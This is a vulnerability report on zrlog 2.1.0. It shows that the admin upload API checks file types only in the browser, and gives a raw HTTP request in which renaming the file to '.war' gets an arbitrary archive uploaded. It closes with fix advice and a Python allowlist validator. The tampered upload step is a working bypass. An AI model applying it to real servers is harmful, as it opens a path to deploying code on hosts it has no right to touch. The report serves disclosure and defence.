There is a file upload API in the backend, which an admin user can use to upload pictures.
It has a file type check, but the file type check is in the frontend, which can be bypassed by tampering with the request packet.
How to prove that the file check is in the frontend?
1. Search for the keyword “错误:只允许上传图片文件,允许上传的图片文件格式有” (the warning text, roughly "Error: only image files may be uploaded; the allowed image file formats are") in the warning, and we can find the information below:
the file check is in the file zrlog-2.1.0\admin\markdown\js\editormd.min.js.
2. Modify the packet below:
```http
POST /zrlog-2.1.0/api/admin/upload/?guid=1546955740878&dir=image HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 92883
Cache-Control: max-age=0
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryATR87YRSWfgChgZq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: http://127.0.0.1:8080/zrlog-2.1.0/admin/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1542180522; admin-token=1#4E6D2F687756637630777677385938504D566B4155736C75364F7176443553364B65433758736A46336B62354D686E524F56597A563334624767563638364361517170385674356679797135695737326F2F6C39366172697475683146755554486F6E7877693564566D453D
Connection: close

------WebKitFormBoundaryATR87YRSWfgChgZq
Content-Disposition: form-data; name="imgFile"; filename="zsdlove2222.jpg"
Content-Type: image/jpeg

ÿØÿà
```
We can modify the filename "zsdlove2222.jpg" to "zsdlove2222.war", then send it to the servlet.
After that we find that we have uploaded the war file successfully.
Suggestions:
1. Check the file type in the backend.
2. Use a whitelist to limit the file types that can be uploaded.
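As an illustration of both suggestions, the following is an added example (not code from the report or from zrlog) of a server-side check in Python: it takes the uploaded filename and body, enforces an extension allowlist, and verifies that the body starts with a signature matching that extension, ignoring the client-supplied Content-Type. The signatures, the `validate_image_upload` name and the sample bodies are assumptions constructed for this example.

```python
import re

# Allowlist: extension -> accepted leading bytes. The JPEG signature is the
# "ÿØÿ" (FF D8 FF) prefix visible at the start of the body in the captured request.
ALLOWED_IMAGE_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}

# Only a plain base name is stored: no dots, slashes, spaces or control characters.
SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_\-]{1,64}$")


class UploadRejected(ValueError):
    """Raised when an upload fails the server-side checks."""


def validate_image_upload(filename: str, data: bytes) -> str:
    """Return the safe name under which to store `data`, or raise UploadRejected.

    The client's Content-Type header is deliberately not consulted: like the
    filename, it is attacker-controlled and was "image/jpeg" in the bypass above.
    """
    if any(c in filename for c in "\x00/\\"):
        raise UploadRejected("filename contains path separators or NUL")
    base, dot, ext = filename.rpartition(".")
    if not dot or not base:
        raise UploadRejected("filename has no extension")
    ext = ext.lower()
    if ext not in ALLOWED_IMAGE_TYPES:          # rejects .war, .jsp, .jpg.war, ...
        raise UploadRejected(f".{ext} is not an allowed image type")
    if not SAFE_BASENAME.match(base):           # rejects "evil.war.jpg" style names
        raise UploadRejected("base name contains disallowed characters")
    if not any(data.startswith(sig) for sig in ALLOWED_IMAGE_TYPES[ext]):
        raise UploadRejected("content does not match the declared image type")
    return f"{base}.{ext}"


def is_accepted(filename: str, data: bytes) -> bool:
    """Convenience wrapper: True if the upload would be stored, False if rejected."""
    try:
        validate_image_upload(filename, data)
        return True
    except UploadRejected:
        return False


# Constructed sample bodies: a JPEG header and a ZIP header (a .war is a ZIP archive).
JPEG_BODY = b"\xff\xd8\xff\xe0" + b"\x00" * 28
ZIP_BODY = b"PK\x03\x04" + b"\x00" * 28
```

With these checks the renamed "zsdlove2222.war" from the report is refused by the extension allowlist, and a ZIP body renamed to "payload.jpg" is refused by the signature check.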
I hope you guys fix this flaw quickly. If you have any questions about the bug fix, contact me by email:
747289639@qq.com